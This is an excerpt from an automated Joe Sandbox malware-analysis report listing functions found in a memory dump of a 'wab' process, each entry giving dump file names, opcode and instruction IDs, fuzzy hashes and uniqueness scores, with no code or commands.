                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96585b87f6324e8018255b305af117f55714d57f3baaecadb8b2285eb99c4ed3
                                                              • Instruction ID: 98a752f8b62657c4eda7058e90fb65858aaf41ae35963edb5b6694670d4c17e7
                                                              • Opcode Fuzzy Hash: 96585b87f6324e8018255b305af117f55714d57f3baaecadb8b2285eb99c4ed3
                                                              • Instruction Fuzzy Hash: 1421DB39601A119FC729CFA8CD41B4277F6AF08B04F2484AAE509CB762E334ED52CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202315A9 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                              • Instruction ID: 12104ae15939a7c9db43428a19cc6672f61feeb75ae69474751fc691571ea695
                                                              • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                              • Instruction Fuzzy Hash: F521D1B1A01686DFD3028FD5CD94B5177F9BF807A0F1540A3ED048B2A2E6B9DC60CA60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20240124 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction ID: ac9e017b775918bf68db8b01390a8b3a5f59cead9270ae1c90e8bd2639735941
                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction Fuzzy Hash: BA11E272A01605AFE7168FD4CC81F9A7BB8EB90754F10002AF6089B180D671EE94DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202180E9 Relevance: .1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97b25feddb328d4d3bd319f9452d30319c6fd8e59e693d0cfce9a78b582420a5
                                                              • Instruction ID: f20faa4391935c190a4c6ad28a897b4f10be4b156a565daf29c32d2a5e4fc562
                                                              • Opcode Fuzzy Hash: 97b25feddb328d4d3bd319f9452d30319c6fd8e59e693d0cfce9a78b582420a5
                                                              • Instruction Fuzzy Hash: C8214F76A00606EFCB04CF98C991A6AFBF5FB49314F20416ED508A7711C771AE56CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20209240 Relevance: .1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c270c52c1d7a0155b81f9a036e83879388354c87c5c4e0a7ef1f208dfae7ab11
                                                              • Instruction ID: 5f3287e63e2166bd54247bfc68374b3c0afdb9793d89a74f6957993acfcd5949
                                                              • Opcode Fuzzy Hash: c270c52c1d7a0155b81f9a036e83879388354c87c5c4e0a7ef1f208dfae7ab11
                                                              • Instruction Fuzzy Hash: 3011E27A02AA16AED3138F91CD81B6237EEEB68A90B104127E901D7360D73DDD51EB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023B052 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83d0bee317306cb1dff83a81100bec9ae3d8de3b1e44584b0fe0c58f1c49fc3d
                                                              • Instruction ID: 3bf99734a20a4aba85bbce6f9807ef60c8f13308efbf169cf7fc58bda9f30163
                                                              • Opcode Fuzzy Hash: 83d0bee317306cb1dff83a81100bec9ae3d8de3b1e44584b0fe0c58f1c49fc3d
                                                              • Instruction Fuzzy Hash: E701D2B2B00700ABD715AFEA9C82F6BB7F8DF94215F00043AF70597240EA74E9148A61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20246620 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ad8575da055656f4f6ce2ed561fe819972b1422cbf8550bb14ba2762af77c47
                                                              • Instruction ID: fa47cfba49174f20d3401eb07a4e8ff6b5703d3838650bc11be1a14148f4be96
                                                              • Opcode Fuzzy Hash: 6ad8575da055656f4f6ce2ed561fe819972b1422cbf8550bb14ba2762af77c47
                                                              • Instruction Fuzzy Hash: 4C11A072E01616ABCB15CFD9CDC5B5EF7BCEF48650F520096EA01A7200C739BD558B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20207330 Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9dd0f816d58db369e9a927917856f302f43e627ab7853fd746d1d80e557b4f85
                                                              • Instruction ID: 5c189df9030e1d4ea7400cf69ac33af08a7077e770cd3f9b20691c70afb64357
                                                              • Opcode Fuzzy Hash: 9dd0f816d58db369e9a927917856f302f43e627ab7853fd746d1d80e557b4f85
                                                              • Instruction Fuzzy Hash: E911A071A007199FE711CF95CC41BAB77E9EB54304F01846AEA85C7211D735EC60ABA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023E53E Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction ID: d331ab20fed1c7b522384231c3b52689b2c0f3a41239f8937f1181e8569a6fa8
                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction Fuzzy Hash: C311E5B2619AC2DFD712CBE8DD84B0537E4AB01788F1500A3EE40876A3E338DD62D651
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023F2D0 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0c0f330c2eac0dff197e4eb1980f4cef005990dff800c978deb9388cec18a44
                                                              • Instruction ID: a7a9a3b85cb3cc7c89e529d11cd65b6562d5a7037b4392baa04872e495ffe953
                                                              • Opcode Fuzzy Hash: a0c0f330c2eac0dff197e4eb1980f4cef005990dff800c978deb9388cec18a44
                                                              • Instruction Fuzzy Hash: EF11C2756016499FC710CFE9DD84B9EB7A8FF44700F1400A7E501E7692D679ED11CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202A72A0 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                              • Instruction ID: c7bce74fd745844b0eb96218f75880b41ad9e3addbaa8105922df8458d019059
                                                              • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                              • Instruction Fuzzy Hash: BE01DE7224050ABFD7058F92CC91F62FB6EFFA43A4B000527F200425A0CB21BCB4CEA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020A250 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction ID: c7d1864af13532c4224c1f8da02120399378ff0374fa13cdaae6496ecd0a6642
                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction Fuzzy Hash: E3012631405B169FC7208F95DC40A627BB6FF65760740853EFD958B681C335E920CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20216259 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61751f027f227e237a46ba9f4d5a0b8082eddb1c4a6f09e9464705a5a6f459ef
                                                              • Instruction ID: 6cd37d10b744385bd3edd51eb512d407392385cdd9d060374c6a6407e2aa2b78
                                                              • Opcode Fuzzy Hash: 61751f027f227e237a46ba9f4d5a0b8082eddb1c4a6f09e9464705a5a6f459ef
                                                              • Instruction Fuzzy Hash: 4311A071501228ABDB29CFA4CD42FD9B7B5AF04710F5041D6B714A60E0DB30AEA9CF88
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2021208A Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction ID: ba69278e429a22e0fa239b1c71bcdde232d8740400b288d313580632b4811142
                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction Fuzzy Hash: 5B01DE326001018BDB008EA9DC80B82B7A6BFE8600F5546A7FD048F247EA729CF5DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020C020 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction ID: 975fcf94e3e2479eccf9c59bf8197a2756ca56eae3ec8db6961ca2e3bff511a0
                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction Fuzzy Hash: 4201F572500709DFDB128BE6DD40F9773EAFFD4610F50481BAA468B940DA74F965CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202520F0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4fce2af310dcafab55ac6a4e7fcd313017ba4d1928f7ab6bf994324939134e36
                                                              • Instruction ID: 357269fbfb8826f944d5563324a04722ae162bfddf6bbd1f43e4f9a6699235db
                                                              • Opcode Fuzzy Hash: 4fce2af310dcafab55ac6a4e7fcd313017ba4d1928f7ab6bf994324939134e36
                                                              • Instruction Fuzzy Hash: 3C11AD35A0120CAFDB08DFA4CC41F9FBBB5EB44344F10805AF90597291DA34AE25CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024E5CF Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de32e3752d1d7cb6a521d4fe65f8e561e4bfc2699bbd43194ac1ea2a915ecb73
                                                              • Instruction ID: e64ea8b99f9e68004c13f5e94c72244d9356dde329ea52e93499fbe7e1b09b3c
                                                              • Opcode Fuzzy Hash: de32e3752d1d7cb6a521d4fe65f8e561e4bfc2699bbd43194ac1ea2a915ecb73
                                                              • Instruction Fuzzy Hash: 8301DFB1201910BFC301AFE9DD81F43B7ACFF986A4B000627B504A3560DB29FC21CAA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20209353 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                              • Instruction ID: 4a028d3f2ed31dfe4de5182c98ea295ae7bb4bb8dd645d1334f331040bfafc9b
                                                              • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                              • Instruction Fuzzy Hash: 5A118E32410B028FD7218F95CC80B12B3E5BF64762F1588AAE48A5A4A6C379E890CF10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024D1D0 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                              • Instruction ID: a5444355905a45444542b583704bbf0f7b222f130d0bbf131b5a2006b8979867
                                                              • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                              • Instruction Fuzzy Hash: 01012F72E11104ABD705CED4EC01F5A33A9EB84A24F20815BFE148F2C2CBB8ED21CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202333A5 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                              • Instruction ID: b034a27c069b71785211c7baa667b08bc456b1294e3c0df213fc23b48ec61d55
                                                              • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                              • Instruction Fuzzy Hash: 0D0167B2701515A7CB168BDA9E41E5A7B6C9FC4640F114066BB15D7160EA30DE21CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CF453 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c243a3fedb5b59bdb41b01d092d506aef0ad12e804e0b2552b5006ff3ed3470
                                                              • Instruction ID: ef6b2397fe970d9d4901bc71c576c7219d38c7fb2f1f1177173cff285e12e812
                                                              • Opcode Fuzzy Hash: 9c243a3fedb5b59bdb41b01d092d506aef0ad12e804e0b2552b5006ff3ed3470
                                                              • Instruction Fuzzy Hash: C8015E71A11248AFCB18DFA9DC42FAFBBB8EF44714F504067B900EB281D674EA15CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CF5BE Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b5aded05d8506ad2c02bce638e72468c90db0a9d3a3e858de68d94dcaa93b40
                                                              • Instruction ID: 3a8bf80bb7034cfed26375f36e17bfd8c9ea849e891422dad83f26bc8853e1a3
                                                              • Opcode Fuzzy Hash: 0b5aded05d8506ad2c02bce638e72468c90db0a9d3a3e858de68d94dcaa93b40
                                                              • Instruction Fuzzy Hash: 7B017171A11248AFCB08DFA9DC42FAEBBB8EF44704F504067B900EB290D674EE15CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2022E016 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: 38487ad8decf90d9917418962d7e34e916f8ca980e85f43119056d4d43eb470e
